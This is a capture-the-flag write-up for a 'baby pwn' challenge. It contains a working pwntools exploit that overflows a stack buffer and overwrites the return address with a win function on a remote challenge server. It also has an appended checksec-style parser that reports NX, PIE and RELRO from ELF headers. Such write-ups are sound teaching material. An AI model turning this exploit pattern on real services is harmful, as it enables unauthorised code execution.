Baby pwn
Here's a baby pwn challenge for you to try out. Can you get the flag?
This is a simple pwn challenge. We have no mitigations enabled, and a buffer overflow:
We also have a win function:
We just need to overwrite the return address with the address of the win function:
```python
from pwn import *
context.log_level = 'debug'
elf = ELF("./baby-pwn")

# Local variant under gdb, kept commented out; swap it in for the remote() line to debug
'''
io = gdb.debug("./baby-pwn", """
c
""")
'''
io = remote("34.162.142.123", 5000)
io.clean()
# 64 bytes fill the buffer, 8 more cover the saved rbp, then the return address follows
io.sendline(flat(
    b"A" * (64 + 1 * 8),
    p64(elf.sym.secret)   # win function; its address is fixed because nothing is PIE here
))
io.interactive()
```
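The script above only works because the binary ships without mitigations: no PIE, so `elf.sym.secret` is a fixed address, and no stack canary, so the 72 bytes of padding reach the return address unchecked. The following added example (not from this post or its challenge) is a small checksec-style parser that reads the ELF64 program headers and reports NX, PIE and RELRO, which is how a reviewer would confirm that a binary is (or is not) built this way. It runs on two constructed in-memory ELF images rather than the challenge file; canary detection needs the symbol table and full RELRO needs the dynamic section, and both are left out here.

```python
import struct

# ELF constants from the ELF / gABI specification
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # 64-byte ELF64 file header
PHDR = struct.Struct("<IIQQQQQQ")           # 56-byte ELF64 program header


def check_mitigations(data: bytes) -> dict:
    """Report NX / PIE / RELRO for an ELF64 image, checksec-style.

    Limitations (by design of this demo): no canary check (needs the symbol
    table) and RELRO is only reported as 'partial' (full RELRO needs the
    dynamic section's BIND_NOW flag).
    """
    if len(data) < EHDR.size or data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not an ELF64 image")
    (_, e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = EHDR.unpack_from(data, 0)

    stack_flags = None
    relro = False
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(data, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True

    return {
        # A missing PT_GNU_STACK makes the loader grant an executable stack,
        # so NX is only "on" when the header exists and lacks PF_X.
        "nx": stack_flags is not None and not (stack_flags & PF_X),
        # Position-independent executables are linked as ET_DYN.
        "pie": e_type == ET_DYN,
        "relro": "partial" if relro else "none",
    }


def make_elf(e_type: int, phdrs: list) -> bytes:
    """Build a minimal ELF64 image (header + program headers) for the demo.

    Constructed input: it carries no code and is not loadable, it only has the
    headers check_mitigations() inspects.
    """
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)   # ELFCLASS64, LSB, EV_CURRENT
    body = b"".join(PHDR.pack(p_type, p_flags, 0, 0, 0, 0, 0, 0x1000)
                    for p_type, p_flags in phdrs)
    hdr = EHDR.pack(ident, e_type, 0x3E, 1, 0, EHDR.size, 0, 0,
                    EHDR.size, PHDR.size, len(phdrs), 0, 0, 0)
    return hdr + body


# Constructed sample: the shape of a "no mitigations" binary like the one in this post
UNPROTECTED = make_elf(ET_EXEC, [(PT_GNU_STACK, PF_R | PF_W | PF_X)])
# Constructed sample: the same binary built with NX, PIE and RELRO
HARDENED = make_elf(ET_DYN, [(PT_GNU_STACK, PF_R | PF_W), (PT_GNU_RELRO, PF_R)])

if __name__ == "__main__":
    for name, image in (("unprotected", UNPROTECTED), ("hardened", HARDENED)):
        print(name, check_mitigations(image))
```

On a real file, `check_mitigations(open(path, "rb").read())` gives the same three answers that `checksec` or pwntools' `ELF.checksec()` would; the point of reading the headers by hand is to see exactly which bit (`PF_X` on `PT_GNU_STACK`, `ET_DYN` in `e_type`) each mitigation turns on.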
This post is licensed under CC BY 4.0 by the author.